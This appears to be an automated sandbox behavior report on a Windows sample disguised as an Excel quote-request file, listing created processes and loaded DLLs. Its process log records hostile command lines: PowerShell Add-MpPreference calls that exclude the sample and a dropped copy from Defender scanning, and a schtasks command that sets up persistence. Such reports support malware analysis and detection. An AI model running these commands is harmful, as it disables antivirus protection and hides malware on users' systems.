Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

File read: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe C:\Users\user\AppData\Roaming\YzkHZRBcm.exe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpB2D1.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process created: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe"
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpA1D9.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Process created: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe "C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\YzkHZRBcm" /XML "C:\Users\user\AppData\Local\Temp\tmpB2D1.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Process created: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe "C:\Users\user\AppData\Roaming\YzkHZRBcm.exe"	Jump to behavior

Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130_xlsx.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\YzkHZRBcm.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
